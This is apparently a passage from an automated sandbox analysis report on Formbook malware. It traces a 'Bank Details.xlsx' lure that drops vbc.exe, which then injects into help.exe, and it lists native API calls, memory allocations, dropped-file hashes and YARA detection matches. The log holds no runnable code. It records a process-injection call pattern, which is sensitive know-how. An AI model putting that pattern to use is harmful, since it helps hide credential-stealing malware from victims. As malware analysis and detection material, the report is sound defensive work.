          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181CA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182FA NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00950048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00950078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00950060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009501D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00950C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009510D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00951148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00951930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00951D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181CA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004182FA NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B310D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30078 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30060 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B301D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B3010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B31148 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B31930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B31D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000981D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00098280 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00098300 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000983B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000981CA NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009827A NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000982FA NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C6332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C67C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004046C3
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004060D9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004068B0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B869
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C07B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C804
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401174
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B985
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CB98
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C6B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C2B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B4B3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C58E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BE99
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF43
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF0C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BFD4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CFA2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A063BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009863DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00962305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009AA37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E05E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A6540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00964680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A02622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009AA634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009629B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009769FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009F49F5
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009AC920
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E6BCB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A02C9C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009EAC5E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00990D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00992E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FCFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009D2FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00970F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00963040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009DD06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009ED13F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A01238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00967353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00995485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00971489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0099D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A035DA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009957C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009F771D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009DF8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009E394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A13A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009EDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00987B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009FFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009EBF14
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C07B
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00401174
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B4B3
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C58E
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B869
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C804
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B985
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CB98
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C6B
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C2B
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BE99
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CF43
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CF0C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BFD4
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CFA2
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B3E0C6
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B6D005
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BBD06D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B5905A
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B43040
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BCD13F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B3E2E9
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BE1238
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BE63BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B663DB
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B3F3CF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B42305
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B8A37B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B47353
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B75485
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B51489
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BC443E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B7D47D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B5C5F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BC05E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BE35DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B4351F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B86540
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B44680
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B4E6C1
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B8A634
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BE2622
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B4C7BC
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BC579A
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B757C3
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BD771D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BDF8EE
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BBF8C4
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B6286D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B4C85C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B429B2
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BE098E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BD49F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B569FE
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BC5955
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BC394B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BF3A83
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BECBA4
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B3FBD7
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BCDBDA
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BC6BCB
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B67B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BE2C9C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BCAC5E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BDFDDD
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B70D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B4CD5B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B72E2F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B5EE4C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BDCFB1
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BB2FDC
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B50F3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00BCBF14
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B6DF7C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009C58E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009C804
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009CB98
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00088C2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00088C6B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00088C70
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009CF0C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009CFA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C67C7
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C5062
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C32FF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C1362
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C3302
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C75B2
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C08F9
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C0902
          Source: Bank Details.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe 18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll 2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
          Source: C:\Users\Public\vbc.exeCode function: String function: 00419F80 appears 40 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0095DF5C appears 137 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A0B0 appears 52 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009CF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009A373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0095E2A8 appears 60 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B83F92 appears 132 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00BAF970 appears 84 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B8373B appears 253 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B3DF5C appears 130 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B3E2A8 appears 60 times
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
